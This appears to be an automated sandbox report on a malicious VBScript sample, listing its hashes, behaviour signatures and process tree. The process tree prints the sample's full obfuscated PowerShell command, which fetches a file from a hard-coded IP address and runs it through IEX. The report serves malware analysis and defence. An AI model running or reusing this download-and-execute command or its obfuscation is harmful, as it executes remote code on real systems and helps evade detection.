Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
10-02-2022 21:38
General
-
Target
DRNTFNAYYIIFLWXZGPDDLOHORDNKIBLKOGRRKKPLPZSWTHCRGCJSAXYHNIZCHDHKUXXB.vbs
-
Size
10KB
-
MD5
fbeb926f8e236f7508dc48afb9d046de
-
SHA1
3f85ddca97316e3a28e237bbf1a8bd8eb8536571
-
SHA256
d65dd59be082d859d41d1d04acebaf9aa6cd71faca93a93e9c830064f6dcff6a
-
SHA512
853f0e3af5b787be2e038c36b90b23577672159d7879929943fca799f97a3b40fc0143534578f547c7cc3e8cecf20a57e5bbe98fb0a147031a69f77fd7ea6f43
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DRNTFNAYYIIFLWXZGPDDLOHORDNKIBLKOGRRKKPLPZSWTHCRGCJSAXYHNIZCHDHKUXXB.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $HUEFUTBTCTLCFKDGFALECUN = '[*+5&/!3<</(%3<$$&<1@#-y*+5&/!3<</(%3<$$&<1@#-t/%&1&+&7=!@8-0(0-+8%$\[/&]9}][1_+@%-&<&#^--%.IO.*+5&/!3<</(%3<$$&<1@#-t)*({3!_=3]@{-+1\}@%{88/%&1&+&7=!@8-0(0-+8%$\4}84}8705\01[/#-(6&19%[/&]9}][1_+@%-&<&#^--%)*({3!_=3]@{-+1\}@%{88/%&1&+&7=!@8-0(0-+8%$\4}84}8705\01[/#-(6&19%d/%&1&+&7=!@8-0(0-+8%$\)*({3!_=3]@{-+1\}@%{88]'.RePlace('*+5&/!3<</(%3<$$&<1@#-','S').RePlace('/%&1&+&7=!@8-0(0-+8%$\','E').RePlace(')*({3!_=3]@{-+1\}@%{88','R').RePlace('4}84}8705\01[/#-(6&19%','A').RePlace('[/&]9}][1_+@%-&<&#^--%','M');$HHPCXNLYCJNJNANYSIXGBXB = ($HUEFUTBTCTLCFKDGFALECUN -Join '')|&('I'+'EX');$HBSWWCHKJPHCIHYLPBADIVC = '[%=}3&3{997<)<9(\/#$9]_y%=}3&3{997<)<9(\/#$9]_#[{9@(%3!%*}#!(]]5)5+%!^%)7)_4&^+#%{370{3-#%m.N!^%)7)_4&^+#%{370{3-#%#[{9@(%3!%*}#!(]]5)5+%.W!^%)7)_4&^+#%{370{3-#%bR!^%)7)_4&^+#%{370{3-#%qu!^%)7)_4&^+#%{370{3-#%%=}3&3{997<)<9(\/#$9]_#[{9@(%3!%*}#!(]]5)5+%]'.RePlace('%=}3&3{997<)<9(\/#$9]_','S').RePlace('!^%)7)_4&^+#%{370{3-#%','E').RePlace('#[{9@(%3!%*}#!(]]5)5+%','T');$HRKBGLQEIIOTGKRAVGDLNFB = ($HBSWWCHKJPHCIHYLPBADIVC -Join '')|&('I'+'EX');$HEKLNIBCXUJQWGFRURKPEYH = '}=5(@3]#3)+286%^()-%7%r\9-9[^\2<62^/3@+]3!){}a^[0__=$7}#(@{][37@^2_&\9-9[^\2<62^/3@+]3!){}'.RePlace('}=5(@3]#3)+286%^()-%7%','C').RePlace('\9-9[^\2<62^/3@+]3!){}','E').RePlace('^[0__=$7}#(@{][37@^2_&','T');$HEBZUFQTNVBUTPKTLSTLJWS = '<=7#5]=_4*+3-]/7}6)-!)\(9%[{[/5=6/[(%9(&%592tR\(9%[{[/5=6/[(%9(&%592++4/41*0$\7@})4_2\{5$/Pon++4/41*0$\7@})4_2\{5$/\(9%[{[/5=6/[(%9(&%592'.RePlace('<=7#5]=_4*+3-]/7}6)-!)','G').RePlace('\(9%[{[/5=6/[(%9(&%592','E').RePlace('++4/41*0$\7@})4_2\{5$/','S');$HHPHRZIHNFHAGPKYQIXDUFE = 'G-^{}6\%&!4)-{0/-92=!)1t1/=&068/-*)_2^(\@_)-}7-^{}6\%&!4)-{0/-92=!)1\{1@=&(406!]](!]+[#[08Pon\{1@=&(406!]](!]+[#[08-^{}6\%&!4)-{0/-92=!)1\{1@=&(406!]](!]+[#[08t1/=&068/-*)_2^(\@_)-}7-^{}6\%&!4)-{0/-92=!)1am'.RePlace('\{1@=&(406!]](!]+[#[08','S').RePlace('-^{}6\%&!4)-{0/-92=!)1','E').RePlace('1/=&068/-*)_2^(\@_)-}7','R');$HXLYDESAYDAKLLLAJUVKBOS = '85{2//*@5<)-^[3_)00#@2449$6@_2+[6{+*=970##$_a101-}+2!%$[72+-&{7+39{To449$6@_2+[6{+*=970##$_n101-}+2!%$[72+-&{7+39{'.RePlace('85{2//*@5<)-^[3_)00#@2','R').RePlace('449$6@_2+[6{+*=970##$_','E').RePlace('101-}+2!%$[72+-&{7+39{','D');&('I'+'EX')($HHPCXNLYCJNJNANYSIXGBXB::new($HRKBGLQEIIOTGKRAVGDLNFB::$HEKLNIBCXUJQWGFRURKPEYH('HttP://54.235.58.2/3/Y7839.txt').$HEBZUFQTNVBUTPKTLSTLJWS().$HHPHRZIHNFHAGPKYQIXDUFE()).$HXLYDESAYDAKLLLAJUVKBOS())2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11.4MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
12KB
-
Filesize
124KB
-
Filesize
8KB